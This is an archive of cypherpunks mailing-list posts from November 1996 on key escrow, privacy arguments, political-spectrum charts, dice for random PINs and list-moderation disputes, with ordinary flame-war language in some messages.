fjRq5MIh4+8=
=9hy3
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 19 Nov 1996 01:04:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Rogue Governments Issuing Policy Tokens
Message-ID: <v03007800aeb7270c6d3b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



We've touched on this issue several times, in several contexts.

The problem (for GAK) of "rogue governments" is this: a government such as
Libya or Panama, henceforth to be known as "Rogueitania," issues policy
cards to all of its citizens, and to all those visiting Rogueitania, and
perhaps through the mail to anyone who pays some fee.

So, unless the U.S. actually does implement _import controls_ on such
things, the willingness of Rogouitania to freely issue policy cards with no
restrictions, guts the U.S. system.

(The crypto community does in fact call these issuers "rogue governments."
For example, in the mid-80s this was the subject of some "Crypto" papers
about rogue governments (like Libya) possibly being willing to issue false
passports to agents, terrorists, etc. Gee, the U.S. would have no interest
in doing such a thing, either for their own agents, their own covert action
squads, or their own 50,000 people given false identities in the Witness
Security Program.)

We raised many issues similar to this during the Clipper I, Clipper II,
etc., exercises. The whole issue of why foreign governments would willingly
see the NSA with intercept capabilities for their traffic was never
addressed by the Administration. Nor was the issue of rogue governments.
Nor many other issues.

(I don't even think Denning and her Blue Ribbon Panel ever issued their
final report on their weekend-long study of Clipper....events sort of made
it moot.)

And I don't expect substantive answers to our questions on the latest
Clipper announcement for years, if ever.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Tue, 19 Nov 1996 01:19:36 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: Playing Cards - Caution!
Message-ID: <3.0b36.32.19961119010045.00f72934@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:01 PM 11/18/96 -0800, Peter Hendrickson wrote:
>Here's why I now prefer dice: Dice are simple.  Each die throw can be
>made to be quite independent of all other die throws.  Even loaded dice
>may be used by throwing them repeatedly and adding the results mod the
>number of sides to the die.  Dice which are suspect may be studied by
>repeated throwing.  Non-independence can be more easily studied as
>it can be assumed that a throw of the die is, at most, related only
>to the previous throw and none before.

I used dice to generate my ATM access code for my last bank account.
(10-sided dice left over from my role-gaming days...)  The looks I got from
the bank personnel was pretty hillarious.  They had little to know clue
about guessable passwords or related issues.  (You would be amazed as to
how many people use birthday information and the like for ATM codes.)  But
then again, they though that the "bank at home" software was pretty secure
too...

---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Tue, 19 Nov 1996 01:19:42 -0800 (PST)
To: amp <amp@pobox.com>
Subject: Re: Extreme Left/Right
Message-ID: <3.0b36.32.19961119011826.00ff1400@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:59 AM 11/19/96 -0400, amp wrote:

>I first saw mention of a chart similar to this in the 60s. It was a way of 
>describing beliefs politically that was put forth by Jerry Pournelle. (Who 
>is available on the net btw.)  

That must be one hell of a download...  ]:>

>> When I used to listen to a certain "leftist" radio station broadcasting 
>> out of New York City, they would talk about "left-wing", communist 
>> dictatorships and "right-wing", fascist dictatorships.  A dictatorship is
>> a dictatorship!!!  The "wing" that it comes from makes no difference!! 
>
>Yup. You hit the nail on the head here. This is something that any thinking 
>person should recognise. The basic way we are taught to understand and 
>reference politics =makes=no=sense=.

The question is whether you wish to be tortured by the Government forces or
the Peoples Revolutionary army.  (I guess is comes down to which side has
had more practice this week...)  Also, will this be deliberate torture or
the accidental kind.  ("Oops.  Sorry.  We were actually after a dully
elected representative of the four horseman.  You just got in the way.
Maybe it will grow back...")

>>  The 
>> way the media defines these things makes no sense; you can't have a 
>> dictatorship on BOTH sides of a POLITICAL SPECTRUM no more than you can 
>> have YELLOW on both sides of the COLOR SPECTRUM.
>
>Take a gander at the libertarian's chart. I think it is a more accurqte way 
>of describing people, and in fact is similar in some ways to what you 
>describe. A philosophy is charted based on how one views personal and 
>property rights.

This assumes that there are only two basic axises that rights are based
opon.  Some of those can get pretty fuzzy.  To properly describe how the
system works would require an n-dimensional hyperpolygon of indeterminate
size.  (Kind of like describing the black budget.  You know it is there,
but looking at it is difficult, and if they catch you looking the hounds of
tindalos will be coming at you out of every corner of the woodwork.)

Personally, I am a political non-euclidean.


---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Mon, 18 Nov 1996 22:26:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Extreme Left/Right
In-Reply-To: <Pine.HPP.3.91.961118184355.23458G-100000@hpg60.astea.com>
Message-ID: <0mYJ==200YUe083bw0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

James Ormond <jimo@astea.com> writes:
<snip>
> He defined the "political spectrum" as follows:
> 
> < ------- LEFT                                                 RIGHT ------->
> 
>             Monarchy      Oligarchy      Democracy      Republic      Anarchy
> 
> Rule by:      ONE            FEW           MANY           LAW           NONE
> 
> Examples:   Dictator,     Communist,      Lynch Mob     Constitutional
>             King          Fascist State                 Govt (US before
>                                                         1930's)

I prefer the 2 dimentional spectrum (the libretarians tend to push
this) that l;ooks more like this:

                (fucking) Statist



           Left                   Right



                   Anarchist

The statist-anarchist (the lidretarians use "libretarian" instead of
"anarchist") scale is dependant on the centralization of power, and the
left-right scale has to do with the amount of collectivism.

So, the extremem of leftist-statis would be a socialist monarchy
(think China), whereas leftist anarchist societies (like the commune I
lived in last summer) are also possible. To round it out, there's
right(ist? wing?) statist, like say pre-revolution France, and
right(ist/wing) anarchist, which is what most people think of as
anarchy, I guess.

As you hint at in your post, the simple right-left scale is totally
inadequate to describe political beliefs. I think that the one you're
using was created by folks who wanted to demonize leftists.

> Maybe I'm totally wrong in my thinking.  If I am please try to clarify 
> things for me.

Hope I did.

> I think that most "leftists" and "rightists" want many of the same 
> things.  We can't get together because the language we use has been so 
> corrupted.  

Yeah, personally, I'm a moderate-left anarchist. It seems to me that
most folks on this list are rightist anarchist. While our desired
furute worlds are not the same, they are completely compatible as
there is no central power to enforce an economic model on the citizen-
units. Our methods to achieving our goals are also quite similar.

Hope this helps,
Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMpFSv8kz/YzIV3P5AQENCwMAgaLrCrefc2y50Zdb8hPdO4enZA3ZvsxW
sLNSqyS6CRuzBWXeCj51FWWVFbWKVyS6BZjnsVkQxJGBli0eI7x8GLP4nPwhz7eq
JCgw8rwGiXIpplMty5RXLD61yfOFpi5o
=GkkO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr> (by way of "George A. Stathis" <hyperlex@prometheus.hol.gr>)
Date: Mon, 18 Nov 1996 15:55:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: REQUESTING INFORMATION :-)
Message-ID: <199611190353.BAA09293@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


f'knights, [hee hee]  (as in c'punks)!!! ROTFL

After the amusing invasion of Sandy-the-cowboy in his attempt
to smash open the already open doors of a virtual (i.e. non-existent)
salloon...  (in the Freedom-Knights list)

(which is a waste of time anyway to watch his show anyway)...
:-)


I REQUEST INFORMATION on those people who compile "Unemployability
Lists" in the USA, as well as ANY other information on this issue.

Senator McCarthy managed to terrorize the entire U.S.A. some decades
ago with such lists (on real paper rather than on computer files).

The "Return to NeoMcCarthyanism" would make an _excellent_ story for
the Greek Newspaper "Eleftherotypia", and some bright young Greek
journalist could seize the opportunity perhaps even for a Headline
Story. Therefore, I include in the recipient list the Greek Newspaper's
Internet Supplement address, and... rub my hands, waiting for your
replies, folks. :-)


We Greeks would like ALL the names of the people who act as "Informers"
of companies denouncing those unfortunate Americans who are doomed
to unemployment. We plan to give these names to all our friends, so
as to warn them WHO to avoid during our summer holidays in Greek
Islands.


Thank you
George A. Stathis
(former columnist in "PC Master" magazine, Athens Greece -1990).

P.S. I wrote each month's MAIN article at the time, and also the monthly
     "A.I." program. I am not active in journalism at the moment, which
     is why someone else is welcome to use the ensuing information.

P.S. TRUST GREEKS. We hold a World Copyright on Freedom of Thought for
     2.500 years or more, and we even donated it to the Public Domain! :-)

     






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Mon, 18 Nov 1996 22:56:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
In-Reply-To: <199611190128.RAA29725@mailmasher.com>
Message-ID: <0mYJac200YUe083co0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

nobody@huge.cajones.com (Huge Cajones Remailer) writes:
> I am asking why I should protect my privacy.  Most people have
> concluded that it is not worth the bother.  Why are they wrong?
> 
> (And, why are privacy advocates uniformly hostile to these questions?
> Because they are asked anonymously?)

I, too, have been rather confused by the responses. I considered
replying as soon as I saw your(?) original post, but figred that my
views would probably already sitting on someone else's mail spool, so
didn't add a "me too" to the list. Unfortunatly, no one has presented
a clear outline, so here goes.

Protection of your privacy

   From "valid" authorities
       You may not trust your government/police/employer to deal
       with your speech/actions in a way that you find acceptable.
       This is kinda the "dark horse" of provacy, since it allows
       the four horsemen to spred porn and serin across the land.
       However, there are many reasons to not trust the gov't. Maybe
       you sell post to cancer patients. Many people would not
       condem your actions, but the DEA would. This also encompases
       the argument of insurance from political revolution which has
       been much dwellt on. (Is dwellt a word?)

   protection from "criminal" elements
      This is typically the argumnet given by econoists and the like.
      You want to protect your CC # and other personal info. Also,
      those posters to alt.sexual.abuse.recovery might want to protect
      their identities.

Protection of the privacy of others
   So, say you don't care if some high school d00d3z clean out your
   bank account and the MeesePolice imprison you for posession of
   _Arabina Nights_. Using techniques to protect your banal infor-
   mation also protects those with something to hide. Take, for
   example, anonymous remailers. Assuming you encrypt and chain and
   all that Good Stuff, the bad guys can't tell your post to cypher-
   punks asking why you should protect your privacy from Bob's post
   to alt.blacknet giving the location of all US nuke sites. If no
   one except those with someting to hide protected their identity,
   then it would be an easy thing to (under a slightly more oppres-
   sive political regime) toss them in jail. 

The first argument (protecting yourself) has been much talked about in
this thread, but the second has been AKAIK, untouched. I, pesonally,
think crypto is just swell. As such, I pgp sign all my posts/email.
Not only is it one more layer of protection against forges, it helps
spread the PGP meme.

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMpFZoskz/YzIV3P5AQEQEgL/ST9XHUJ1GmAe53n2P1pRD0kyJX+1r9Iz
LUd5PfDkYdMUIhws2JFGtCjCd4ie7tzIVmGj7km7y9KDPO+ih1Y12sPI4Tc1xS8u
Wp9lXtznFeSZzGwECIGtfJSqphzS53Da
=C6la
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Higgins <higgins+@CMU.EDU>
Date: Mon, 18 Nov 1996 23:18:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
In-Reply-To: <199611190651.AAA00275@mailhub.amaranth.com>
Message-ID: <gmYJvGG00YUn0Ttc00@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Forgive me if I missed it, but there seems to have been little
discussion of the link between privacy and identity in this thread.
(The list is so noisy that I miss a lot of things.)

On most computer systems, one's identity is represented by some
secret, whether it's a login password or a private key.  Obviously, to
maintain the integrity of the identity the secret must be protected
which requires privacy.

Now whether or not I have "something to hide", I very much want to
protect my identity from being usurped.  (He who steals my purse
steals trash...)

Now is it the case that people are interested in stealing identities?
Certainly.  My account on the CMU Andrew system (where this is being
written) was compromised once.  Not out of any animosity toward me,
but simply as a platform to launch a hacking attack on some other
system.  (Universities, and I suspect other networks, are rife with
packet sniffers.  Having been burned once, I rely tremendously on
encrypted connections.)

This is not to say that one's identity-secret is the only secret worth
protecting.  But I thought I'd mention it as something to think about.

	Mike

P.S. In a way, credit card numbers are identities --- the fact that we
just hand them out to people is very disconcerting.  (I'm told that
most credit card fraud is by vendors.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Mon, 18 Nov 1996 16:29:21 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Fuck You Dumb Cunt
Message-ID: <199611190428.CAA11326@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 07:11 ìì 18/11/1996 -0500, Stephen Boursy wrote:
>Dave Hayes wrote:
>> 
>> Brian Davis writes:
>>
>>> I'm especially sorry that some of you don't believe in property
>>> rights.
>> 
>> I believe in them, alright. It's just that they seem to be at odds
>> with freedom of speech.
>> 
>> They are at odds with a lot of other things as well, but that's
>> a different fla...er...discussion.
>
>
>  I believe the posession of property is a priv. to be taken 
>away if abused.  There is no such thing as a 'right' to 
>property--in fact the very notion seems absurd.
>
>                        Steve

Philosophically, a lot of people would agree with you Steve, and this would
probably place them in dozens of "killfiles", "lists of unemployable persons",
plug-pullable minorities of "kooks" and so on, inside the American Section
of the Internet. No wonder (after malicious slander I have seen directed
against you), that so few people come out with such views. However...

Reality has many facets, and property can mean many things.

"Abusing property" is also punishable already by some (very capitalistic) laws.

I know I deserve everything I own, but do the chicken know it?
The chicken who hide behind roles like Gilmore's for instance.

Surely the ONLY things we most CERTAINLY own, are our bodies and our speech
and other facets of our existence.

If  people were offered large sums of money to cut off one... hand, they'd
probably refuse! :-)  Goddess Venus knows why if a lot of people when
offered similar similar sums of money to chop off their speech, they obey.

I am very troubled at recent events and spend my time wasting yours.
But wait till you see what I figured out... :-)
(with the Greek paper).
George

















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Nov 1996 23:51:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Securing Electronic Mail Within HMG
Message-ID: <1.5.4.32.19961119074914.006a7368@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We have received from an anonymous source a document titled:

"Securing Electronic Mail Within HMG, Part I, Infrastructure 
and Protocol." 21 March 1996.

>From the Introduction:

"This document is the first part of CESG's recommendations for 
securing electronic mail within HMG. The main objective of the 
recommendations is to facilitate pan-government secure inter-
operability of electronic mail, by simplifying the implementation 
of secure electronic mail within government, ensuring secure 
electronic mail between departments is possible, attempting to 
facilitate future inter-operability with commercial users,
maximising the use of commercial technology in a controlled manner,
whilst allowing access to keys for data recovery or law enforcement 
purposes if required."

Other sections describe:

2. Authentication Framework

3. Confidentiality Framework

4. Security Protocol

The document refers to the Royal Holloway program for TTP critiqued 
by Ross Anderson and others as "EuroClipper." Perhaps those with 
more knowledge could make an assessment.

The document consists of 13 pages of text and diagrams, with 
a few gaps.

-----

http://jya.com/sem.htm  (35 kb with 7 jpg images)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <amp@pobox.com>
Date: Tue, 19 Nov 1996 00:01:15 -0800 (PST)
To: jimo@astea.com
Subject: Re: Extreme Left/Right
Message-ID: <01IC0JILZQV49FMADN@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: jimo@astea.com, cypherpunks@toad.com
Date: Tue Nov 19 01:59:15 1996
> I always had trouble understanding what people meant when they used the 
> terms "extreme left" and "extreme right".  Then, about 4 months ago, I
> saw a guy define the "political spectrum" the way (he said) it used to be
> defined before the definitions were corrupted (by whomever wants to 
> divide - and conquer - the people).  It made sense to me.  A spectrum 
> afterall, at least when we're talking about colors, starts with one type
> of color and graduates to other, DIFFERENT colors.

The real problem you are having is that the political 'spectrum' is not 1 
dimensional (a line). If you describe it in 2 dimensions, it makes a lot 
more sense. The libertarians have a diagram they call the worlds smallest 
political quiz that describes it fairly well. It can be found at 
http://www.libertarian.com/wwlp/docs/awspq.html?quiz

I first saw mention of a chart similar to this in the 60s. It was a way of 
describing beliefs politically that was put forth by Jerry Pournelle. (Who 
is available on the net btw.)  

 
> When I used to listen to a certain "leftist" radio station broadcasting 
> out of New York City, they would talk about "left-wing", communist 
> dictatorships and "right-wing", fascist dictatorships.  A dictatorship is
> a dictatorship!!!  The "wing" that it comes from makes no difference!! 

Yup. You hit the nail on the head here. This is something that any thinking 
person should recognise. The basic way we are taught to understand and 
reference politics =makes=no=sense=.


>  The 
> way the media defines these things makes no sense; you can't have a 
> dictatorship on BOTH sides of a POLITICAL SPECTRUM no more than you can 
> have YELLOW on both sides of the COLOR SPECTRUM.

Take a gander at the libertarian's chart. I think it is a more accurqte way 
of describing people, and in fact is similar in some ways to what you 
describe. A philosophy is charted based on how one views personal and 
property rights.

amp

===
amp@pobox.com
Earth First! We'll strip mine the other planets later!
===
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMpFo01UbR1RWr40pAQG9Xwf/YN1d9WYNjX4NG9J2O5w78+c1XWPXVVII
b8vN9UmfsaG4fXvo+1RY2nwCm20riAQ+4KPpzANSMI5T7LePRuHHR6NcHIDbVnNv
zb7mlxfsvgpUR+cvNDWOsi2gkJoxhJhBn9x3gvsdGKSz2fTUA+5LUgVIrkZjicll
qro7d3omrf4OetDmkehYK1YeAJg3bv1yGj5HMxaMrT8RBzU625goyxz8MBc0PlkL
NrXz7uUdFd1AAElmqenkRp2jjSiZ3dQkenOuaN8T8eV5hAAdnUKLQd36ffBclqKj
D4ggCz27CCvTFtC/wFXFbKOhHXqARk06o4ELJBcVO/Ka8FBVi5+C4Q==
=suQe
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Mon, 18 Nov 1996 17:21:04 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
Message-ID: <199611190509.DAA13737@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


Dear "Info",


Mr. Stephen Boursy has made a number of important revelations here.
I went back and read nearly all his posts, and I will say this _again_,
I have found NOTHING to suggest a lack of reliability in what he says.

I am in no way affiliated to Mr. Boursy. I have never seen his face, even.

In fact I had hardly noticed Mr. Boursy's presence till only a few days
ago, when the forcible expulsion of Russian Mathematician Dimitri Vulis
from the "cypherpunks" list fell like a bomb over my naive gullible head.
Only AFTER this, I started reading ALL the previous postings that I had
missed (about 60-70 % of them).

I decided to find out what's happening.

I saw OBVIOUS things, and OBVIOUS LIES, since as a lurker who kept
ALL previous postings (in the Freedom-Knights list and elsewhere) I could
COMPARE my archives to what people claimed.  More often than not, to
my amazement, what a LOT of people claimed were packs of lies. And against
Mr. Boursy and Mr. Dimitri Vulis in particular, entire SEWAGES of lies.

'
So I forward this info to... "INFO", the Weekly Net-Supplement of
"Eleftherotypia", Greece's largest and most democratic newspaper.

The Greek public are rather well informed on the "shiny" side of the
Internet. But (the director of "Info" and I) have met and discussed,
on two occasions, a few months ago,  ALSO the "DARK" side....

Our only problem, is VOLUME. It's like trying to clean up a shit-hole
which has spilled the shit even outside itself, in the garden... :-)

(The AMERICAN section of the internet, i.e. MOST of it).


Here goes...



At 07:24 ìì 18/11/1996 -0500, Stephen Boursy wrote:
>George A. Stathis wrote:
>> 
>> At 12:07 ðì 17/11/1996 -0600, snow wrote:
>>>
>>>    Boursy is a twit who has lost more accounts that Vulis.
>
>
>  I've lost but one account--world.std.com (Software Tool &
>Die) soon to be purchased by the conglomorate Plug Pullers
>R US.  That was entirely related to a local rent control
>matter.  Now I may be a 'twit'--that is an entirely
>different matter.
>
> 
>> I would suggest that it is not at all a "safe" indication of personal
>> or intellectual _worth_, (of Mr. Boursy or of anyone) "how many
>> accounts he has lost".
>
>   I would say though that if one makes false statements as has
>this 'snow' character it indicates a lack of credibiltiy.
>
> 
>>>    Ignore him.
>
>  Something you seem unable to do.  Isn't it odd how some will
>tell you how insignificant and irrelevant you are only to devote
>so much of their time and energy to you.  I find that very odd.
>
> 
>> It is not ethical to send such strong negative _injunctions_ to masses
>> of people and also to strangers (the 1900-strong members of the cyberphunks
>> list for instance). 
>
>  Well thanks George but I do think his statement speak for themselves.
>I'm not in the least concerned someone like him could harm me--in fact
>I find it very amusing that he is deemed 'acceptable for that list
>while Dr. Vulis is not.
>
>> Because, you may or may not have strong reasons for
>> believing you are justified in such invalidation, but more than a 1000
>> people are now _told_ by (self-appointed) "experts" such as yourself what
>> and whom to ignore or to believe. (Like sheep led to the slaughter)...
>
>
>   Well that's sort of like Tiny Tim Skirvin and his Global Killfile--
>it does him more harm than those he is after--in fact little Tim reads
>my every word.
>
> 
>> But what you are doing now, extending the "1-person-blacklist" to your
>> number-two-entry (Mr. Boursy) is exactly the thing that I hoped you might
>> avoid.
>
>  And based on lies as well--I've only had one account terminated--that
>by Barry Shein who lives in Brookline, Ma. and that was entirely do
>to real estate industry money and the rent control issue (a statewide
>referrendum on rent control which existed only in Brookline, Cambridge,
>and Boston)--many millions of dollars at stake there.  Shein is simply
>a whore.
> 
>>         First they kicked out Dimitri Vulis.
>> 
>>         Then they slandered and kept out Steve Boursy.
>
>  Well my suggestion--given the size of the list and that we have
>numerous sympathizers there--is to have all of their posts forwarded
>and publically post them for free and open discussion.
>
>                            Steve
>
>
>> 
>>         Then...
>> 
>>         When they came after me, there was nobody left to support me.
>> 
>> (You can perhaps realize what this paraphrase is about)... :-(
>> 
>> Sincerily, and with... Sanity of Mind :-)
>> George Stathis
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Main Contact <isptv@access.digex.net>
Date: Tue, 19 Nov 1996 00:17:09 -0800 (PST)
Subject: "Meeks Unfiltered" on ISP-TV Wednesday nights
Message-ID: <199611190816.DAA15253@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


*** ISP-TV Program Announcement:

	"Meeks Unfiltered"

*** Wednesday, Nov. 20 ***
*** 8:00 PM ET         ***

Brock N. Meeks, publisher of the 800,000 subscriber CyberWire Dispatch
electronic news service, will bring his crusading style into real-time
Internet video with "Meeks Unfiltered." The live uncensored hour-long
show, produced and distributed through ISP-TV, will explore cyberspace and
cyberpolitics Wednesdays at 8 PM Eastern Time. 

***
If you missed last week's show with Brock and Declan McCullagh, you can
listen to a RealAudio version at:

		 http://www.digex.net/isptv/meeks.html
***

"Meeks Unfiltered" can be viewed on the ISP-TV main CU-SeeMe reflector at
IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at
http://www.digex.net/isptv/members.html

See URL http://www.digex.net/isptv for more information about the ISP-TV
Network

To obtain Enhanced CU-SeeMe software, go to:

	http://goliath.wpine.com/cudownload.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Tue, 19 Nov 1996 00:23:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Exposing GAK / Clipper III
Message-ID: <9611190823.AA09555@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text


(this is my preliminary .02 cents on a part of this so far)

I've been giving the "how to deal with this" question some thought,
as it seems the government strategy is to chip away at our
right to privacy via extorting compromise and any other method
they can come up with. 

It occurs to me that one of the things that has been going on,
is that the Government (US) in it's discussion of crypto and
what it will and won't allow, has been playing on the nature of
the beast somewhat. In that many of the most tradtional uses of
crypto are to keep the conversations of governments private,
there is a neccesary tradition of quiet and secrecy that goes on
about it.

It appears to me that this aspect of "quiet" discussion has carried
over into the discussions with the private sector over it. Well, the
problem I see with that is that it makes little to no sense. There
is no reason for it. In many, many other sectors of the government,
with the defense industry perhaps being the most leading one, 
private entities of all sorts, and particularly corporations, go to
a serious effort to openly lobby their positions as well as what they
want PUBLICLY to the government.

The recent spam of TV ads in the DC area by Lockheed Martin corp. is 
a very good example of this type of effort. 

My point being, what sorts of things the government is asking of
industry should be far more openly disputed and discussed, and lobbied
than they are. Crypto is not the black art, nor is it that-which-has-no
name and should you say it you'll be struck by lightning type of thing
that certain gov entities treat it as, it's a frakin tool to ensure
privacy, and that's all. Granted, it's one hell of a hard tool to work
on and with, but it's still just a tool.

We need more openess from industry and interested corporations. Lame
press confrences that come after the fact are not in their or the
public's interest. Perhaps we as the public should try to encourage that
more directly from corps as well.
 



Tim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patm@connix.com (Pat McCotter)
Date: Tue, 19 Nov 1996 01:07:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Extreme Left/Right
In-Reply-To: <Pine.HPP.3.91.961118184355.23458G-100000@hpg60.astea.com>
Message-ID: <329174bc.8030604@smtp.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Nov 1996 20:10:53 -0500 (EST), you wrote:

:
:Sandy,
:
:I always had trouble understanding what people meant when they used the 
:terms "extreme left" and "extreme right".  Then, about 4 months ago, I
:saw a guy define the "political spectrum" the way (he said) it used to be 
:defined before the definitions were corrupted (by whomever wants to 
:divide - and conquer - the people).  It made sense to me.  A spectrum 
:afterall, at least when we're talking about colors, starts with one type 
:of color and graduates to other, DIFFERENT colors.
:
:He defined the "political spectrum" as follows:
:
:< ------- LEFT                                                 RIGHT ------->
:
:            Monarchy      Oligarchy      Democracy      Republic      Anarchy
:
:Rule by:      ONE            FEW           MANY           LAW           NONE
:
:Examples:   Dictator,     Communist,      Lynch Mob     Constitutional
:            King          Fascist State                 Govt (US before
:                                                        1930's)

You forgot the property situation under each.

Anarchy: (IMO belongs left of monarchy, just to keep it mathematical)
           Ownership and distribution of product of ownership
              controlled by the strongest mob.

Monarchy:  Ownership by the one. Privileged few allowed to make use of
              it.

Oligarchy:
           Communist: No private ownership. Distribution of product by
              the state.
           Fascist: Private ownership allowed. Distribution of product
              by the state.

Democracy: Ownership and distribution by the loudest mob.

Republic:  Private ownership and private determination of
              distribution.
            (Major paradigm shift in governance - away from whims of
              one/few/many *people* to *objective laws*.) 
                  NOTE: Key word here is *objective* - not law. Whims
                        are subjective.

--
Pat McCotter
Finger patm@connix.com for PGP Public Key
PGP Key Fingerprint     PGP Key ID D437B2D9
D0 E7 C6 5A 9E EF 0D CF  C7 10 88 2A 73 41 11 24




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 18 Nov 1996 20:56:31 -0800 (PST)
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: The Utility of Privacy
In-Reply-To: <199611182000.MAA23957@abraham.cs.berkeley.edu>
Message-ID: <Pine.LNX.3.94.961119045250.1139A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Nov 1996, John Anonymous MacDonald wrote:

> 
> At 11:13 PM 11/17/1996, Huge Cajones Remailer wrote:
> > Examples?
> 
> How about the draft?  The privacy protected child has options the
> others do not.  Legal risk okay - beats getting shot.

Of course, if they fully instate the draft, and you don't fill out the
forms, they'll prosecute you for treason, and then they gas you (which is 
usually much more painfull and damaging than being shot is).

Don't get me wrong, I'm all for privacy; this just isn't the best example.

> diGriz

 --Deviant
Blood flows down one leg and up the other.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 18 Nov 1996 21:01:05 -0800 (PST)
To: Ernest Hua <hua@chromatic.com>
Subject: Re: How to slow the animals ...
In-Reply-To: <199611190020.QAA17742@server1.chromatic.com>
Message-ID: <Pine.LNX.3.94.961119045608.1139B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


uOn Mon, 18 Nov 1996, Ernest Hua wrote:

> 
> It seems that there are many technical means to stop abuse from
> the resource usage sense:
> 
> 1.  Prevent non-members from sending mail to the list.  (This may
>     be done already, but since I don't know, I cannot say.)
> 

This makes anonymous remailers not be able to send to the list, which is
(in principle) a Bad Thing.

> 2.  Limit the rate of new subscription requests (perhaps on a per-
>     host or per-domain basis.)
> 

Most domains don't have more than 1 problem user on them and on this list.

> 3.  Re-order out-going mail (from toad.com) according to size.
